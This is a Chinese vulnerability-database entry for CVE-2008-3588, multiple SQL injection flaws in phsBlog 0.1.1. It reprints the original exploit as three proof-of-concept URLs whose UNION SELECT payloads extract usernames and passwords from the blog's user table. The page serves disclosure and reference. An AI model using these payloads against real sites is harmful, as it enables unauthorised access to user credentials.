phsBlog 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115815 漏洞类型 SQL注入
发布时间 2008-08-01 更新时间 2009-03-18
CVE编号 CVE-2008-3588 CNNVD-ID CNNVD-200808-137
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/6190
https://cxsecurity.com/issue/WLB-2008080135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-137
|漏洞详情
phsBlog是一套免费的博客网站平台。phsBlog0.1.1版本存在多个SQL注入漏洞。远程攻击者可通过comments.php的eid参数、index.php的cid参数及entries.php的urltile参数实现SQL注入,执行任意SQL命令。
|漏洞EXP
#####################################################################################
#
#   Name    :   phsBlog v0.1.1 Multiple Remote SQL Injection Vulnerabilities
#   Author  :   cOndemned [Dark-Coders member]
#   Greetz  :   ZaBeaTy, GregStar, str0ke, 0in, suN8Hclf, ixos, TBH, Avantura :**
#
#####################################################################################


Proof of Concept :

    Magic Quotes = On/Off 

        http://[host]/[phsBlog_path]/comments.php?eid=-1+UNION+SELECT+concat_ws(0x3a,username,password),2+FROM+phsblog_users/*

    Magic Quotes = Off

        http://[host]/[phsBlog_path]/index.php?cid='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users/*
        http://[host]/[phsBlog_path]/entries.php?urltitle='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users

# milw0rm.com [2008-08-01]
|参考资料

来源:XF
名称:phsblog-multiple-sql-injection(44163)
链接:http://xforce.iss.net/xforce/xfdb/44163
来源:MILW0RM
名称:6190
链接:http://www.milw0rm.com/exploits/6190
来源:SREASON
名称:4135
链接:http://securityreason.com/securityalert/4135